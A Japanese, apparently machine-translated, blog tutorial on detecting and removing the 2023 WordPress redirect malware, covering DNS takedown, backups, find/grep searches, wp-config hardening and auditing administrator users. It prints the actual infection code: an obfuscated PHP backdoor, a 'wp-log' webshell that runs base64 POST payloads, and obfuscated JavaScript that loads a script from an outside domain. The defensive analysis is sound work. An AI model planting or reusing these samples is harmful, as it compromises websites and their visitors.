WordPress それは間違いなく最も使用されているプラットフォームです CMS (Content Management System) ブログとスターター オンライン ストアの両方用 (モジュールを使用) WooCommerce)、コンピュータ攻撃(ハッキング)の最も標的となっています。 最もよく使用されるハッキング操作の XNUMX つは、侵害された Web サイトを他の Web ページにリダイレクトすることを目的としています。 Redirect WordPress Hack 2023 は比較的新しいマルウェアで、サイト全体をスパム Web ページにリダイレクトしたり、ユーザーのコンピュータに感染する可能性があります。
サイトが次のような環境で開発された場合 WordPress 別のサイトにリダイレクトされた場合、すでに有名なリダイレクト ハッキングの被害者である可能性が高くなります。
このチュートリアルでは、リダイレクトに感染した Web サイトのウイルスを除去するために必要な情報と役立つヒントを紹介します。 WordPress Hack (Virus Redirect)。 コメントを通じて追加情報を入手したり、助けを求めることができます。
キュプリン
サイトをリダイレクトするウイルスの検出 WordPress
Web サイトのトラフィックの突然の不当な減少、注文数 (オンライン ストアの場合) または広告収入の減少は、何か問題が発生していることを示す最初の兆候です。 を検出中」Redirect WordPress Hack 2023」(ウイルス リダイレクト)は、Web サイトを開いて別の Web ページにリダイレクトされるときに「視覚的に」実行することもできます。
経験上、ほとんどの Web マルウェアはインターネット ブラウザと互換性があります。 Chrome, Firefox, Edge, Opera。 あなたがコンピュータユーザーの場合 Mac、これらのウイルスはブラウザでは実際には表示されません Safari。 からのセキュリティシステム Safari これらの悪意のあるスクリプトをサイレントにブロックします。
Web サイトが感染した場合の対処方法 Redirect WordPress Hack
最初のステップは、パニックに陥ったり、Web サイトを削除したりしないことを願っています。 感染したファイルやウイルスファイルであっても、最初は削除しないでください。 これらには、セキュリティ侵害がどこにあるのか、何がウイルスに影響を与えたのかを理解するのに役立つ貴重な情報が含まれています。 手口。
ウェブサイトの公開を閉鎖します。
訪問者に対してウイルス Web サイトを閉じるにはどうすればよいでしょうか? 最も簡単な方法は、DNS マネージャーを使用して「A」(ドメイン名) の IP を削除するか、存在しない IP を定義することです。 したがって、ウェブサイトの訪問者はこの問題から保護されます。 redirect WordPress hack ウイルスやスパム Web ページに誘導される可能性があります。
使用する場合 CloudFlare DNS マネージャーとしてアカウントにログインし、DNS レコードを削除します。Aドメイン名には「」を使用します。 したがって、ウイルスの影響を受けたドメインには IP が割り当てられず、インターネットからアクセスできなくなります。
Web サイトの IP をコピーし、自分だけがアクセスできるように「ルーティング」します。 コンピューターから。
コンピュータ上で Web サイトの実際の IP を変更する方法 Windows?
この方法は、「hosts」ファイルを編集することで特定の Web サイトへのアクセスをブロックするためによく使用されます。
1.あなたが開く Notepad または他のテキスト エディタ (権限付き) administrator) ファイルを編集します。hosts」。 以下の場所にあります。
C:\Windows\System32\drivers\etc\hosts2. 「hosts」ファイルで、Web サイトの実際の IP に「route」を追加します。 上記の IP が DNS マネージャーから削除されました。
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. ファイルを保存し、ブラウザで Web サイトにアクセスします。
Web サイトが開かず、「hosts」ファイルに何も間違っていない場合は、DNS キャッシュが原因である可能性が高くなります。
オペレーティング システムの DNS キャッシュをクリアするには Windows、 開ける Command Promptで、次のコマンドを実行します。
ipconfig /flushdnsコンピュータ上で Web サイトの実際の IP を変更する方法 Mac / Mac本?
コンピュータユーザー向け Mac Web サイトの実際の IP を変更する方がいくらか簡単です。
1. ユーティリティを開きます Terminal.
2. コマンド ラインを実行します (実行するにはシステム パスワードが必要です)。
sudo nano /etc/hosts3. コンピュータと同じ Windows、ドメインの実際の IP を追加します。
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. 変更を保存します。 Ctrl+X (y).
「ルーティング」した後は、次の方法で感染した Web サイトにアクセスできるのはあなただけになります。 Redirect WordPress Hack.
Web サイトの完全バックアップ – ファイルとデータベース
たとえ感染してもredirect WordPress hack」にあるように、Web サイト全体の一般的なバックアップを作成することをお勧めします。 ファイルとデータベース。 おそらく、両方のファイルのローカル コピーを次の場所に保存することもできます。 public / public_html データベースも同様です。
感染したファイルと変更されたファイルの特定 Redirect WordPress Hack 2023
主な対象ファイルは、 WordPress あります index.php (根元に)、 header.php, index.php シ footer.php テーマの WordPress 資産。 これらのファイルを手動でチェックし、悪意のあるコードまたはマルウェア スクリプトを特定します。
2023年、「」のウイルスが蔓延。Redirect WordPress Hack”を入れた index.php 次の形式のコード:
(これらのコードを実行することはお勧めしません。)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>デコードすると、これ 悪意のあるスクリプト これは基本的に Web サイトが感染した結果です WordPress。 これはマルウェアの背後にあるスクリプトではなく、感染した Web ページをリダイレクトできるようにするスクリプトです。 上記のスクリプトをデコードすると、次のようになります。
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
このコードを含むサーバー上のすべてのファイルを特定するには、アクセスできるとよいでしょう。 SSH ファイルチェックと管理コマンドラインを実行するためにサーバーに接続します。 Linux.
関連する ブログが感染しているかどうかを確認する方法 (ヘルプ付き) Google Search 。 (WordPress ウイルス)
以下に、最近変更されたファイルと特定のコード (文字列) を含むファイルを識別するのに間違いなく役立つ XNUMX つのコマンドを示します。
どうやって見えますか Linux PHP ファイルは過去 24 時間以内に変更されましたか、それとも他の時間枠で変更されましたか?
注文するfind」の使い方は非常に簡単で、期間、検索するパス、ファイルの種類を設定するカスタマイズが可能です。
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"出力では、ファイルが変更された日時、書き込み/読み取り/実行権限 (chmod)およびどのグループ/ユーザーに属しているか。
さらに日前を確認したい場合は、値を変更してください。-mtime -1” または” を使用してください-mmin -360」を数分間(6時間)続けます。
PHP、Javaファイル内のコード(文字列)を検索するにはどうすればよいですか?
特定のコードを含むすべての PHP または Java ファイルをすばやく検索できる「find」コマンド ラインは次のとおりです。
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +このコマンドはファイルを検索して表示します。 .php シ .js を含むuJjBRODYsU"
上記の XNUMX つのコマンドを使用すると、どのファイルが最近変更されたか、またどのファイルにマルウェア コードが含まれているかを簡単に見つけることができます。
正しいコードを損なうことなく、変更されたファイルから悪意のあるコードを削除します。 私のシナリオでは、マルウェアは開く前に配置されました。 <head>.
最初の「find」コマンドを実行すると、サーバー上で自分のものではない新しいファイルが検出される可能性が非常に高くなります。 WordPress あなたがそこに置いたものでもありません。 ウイルスの種類に属するファイル Redirect WordPress Hack.
私が調査したシナリオでは、「wp-log-nOXdgD.php」。 これらは「スポーン」ファイルであり、ウイルスがリダイレクトに使用するマルウェア コードも含まれています。
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}タイプ「」のファイルの目的wp-log-*」は、サーバー上でホストされている他の Web サイトにリダイレクト ハッキング ウイルスを拡散させることです。 これは「」タイプのマルウェア コードです。webshell」で構成されています。 基本編 (いくつかの暗号化された変数が定義されています) および o 実行セクション これにより、攻撃者はシステム上で悪意のあるコードをロードして実行しようとします。
変数がある場合 POST という名前のbh' とその暗号化された値 MD5 は「」に等しい8f1f964a4b4d8d1ac3f0386693d28d03"の場合、スクリプトは暗号化されたコンテンツを書き込むように見えます。 base64 という別の変数のb3' を一時ファイルに追加し、この一時ファイルを含めようとします。
変数がある場合 POST または GET という名前のtick' の場合、スクリプトは値を返します。 MD5 文字列「」の885"
このコードを含むサーバー上のすべてのファイルを識別するには、共通の文字列を選択し、コマンド「」を実行します。find」(上記と同様)。 このマルウェア コードを含むすべてのファイルを削除します.
セキュリティ上の欠陥を悪用したのは、 Redirect WordPress Hack
おそらくこのリダイレクト ウイルスは次の経由で到達します。 管理ユーザーの悪用 WordPress または、 脆弱なプラグイン これにより、次の権限を持つユーザーを追加できます。 administrator.
プラットフォーム上に構築されたほとんどの Web サイトの場合 WordPress 可能です テーマまたはプラグインファイルの編集管理インターフェイスから (Dashboard)。 したがって、悪意のある人がテーマ ファイルにマルウェア コードを追加して、上記のスクリプトを生成する可能性があります。
このようなマルウェア コードの例は次のとおりです。
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript テーマヘッダーで識別される WordPressラベルを開けた直後 <head>.
この JavaScript を解読するのは非常に困難ですが、ファイルを作成するために他のスクリプトを取得する可能性が最も高い場所から別の Web アドレスをクエリしていることは明らかです。wp-log-*」と上でお話しました。
すべてのファイルからこのコードを見つけて削除します PHP 影響を受ける。
私が知る限り、このコードは 手動で追加された 管理者権限を持つ新しいユーザーによる。
したがって、ダッシュボードからマルウェアが追加されるのを防ぐには、編集オプションを無効にすることが最善です。 WordPress ダッシュボードからのテーマ/プラグイン。
ファイルを編集する wp-config.php 次の行を追加します。
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);この変更を行った後、ユーザーは WordPress ダッシュボードからファイルを編集できなくなります。
の役割を持つユーザーを確認してください Administrator
以下は、次の役割を持つユーザーを検索するために使用できる SQL クエリです。 administrator プラットフォームで WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'このクエリはテーブル内のすべてのユーザーを返します。 wp_users 誰がその役割を割り当てたのか administrator。 クエリはテーブルに対しても実行されます wp_usermeta メタで検索するには 'wp_capabilities'、これにはユーザーの役割に関する情報が含まれています。
別の方法は、以下からそれらを識別することです。 Dashboard → Users → All Users → Administrator。 ただし、ダッシュボード パネルでユーザーを非表示にする方法もあります。 つまり、ユーザーを確認する最良の方法です」Administrator"で WordPress は上記の SQL コマンドです。
私の場合、データベース内で「」という名前のユーザーを特定しました。wp-import-user」。 かなり示唆的です。
また、ここから、ユーザーがアクセスした日付と時刻を確認できます。 WordPress 作成されました。 ユーザー ID はサーバー ログを検索するため、非常に重要です。 こうすることで、このユーザーのすべてのアクティビティを確認できます。
の役割を持つユーザーを削除します administrator それならあなたは知りません パスワードを変更する すべての管理ユーザーに。 編集者、著者、 Administrator.
SQLデータベースユーザーのパスワードを変更する 影響を受ける Web サイトの。
これらの手順を実行した後、すべてのユーザーに対して Web サイトを再起動できます。
ただし、上で紹介したものは、Web サイトが感染するおそらく数千のシナリオのうちの XNUMX つであることに留意してください。 Redirect WordPress Hack 2023年。
あなたの Web サイトが感染していてサポートが必要な場合、または質問がある場合は、コメント セクションが開いています。
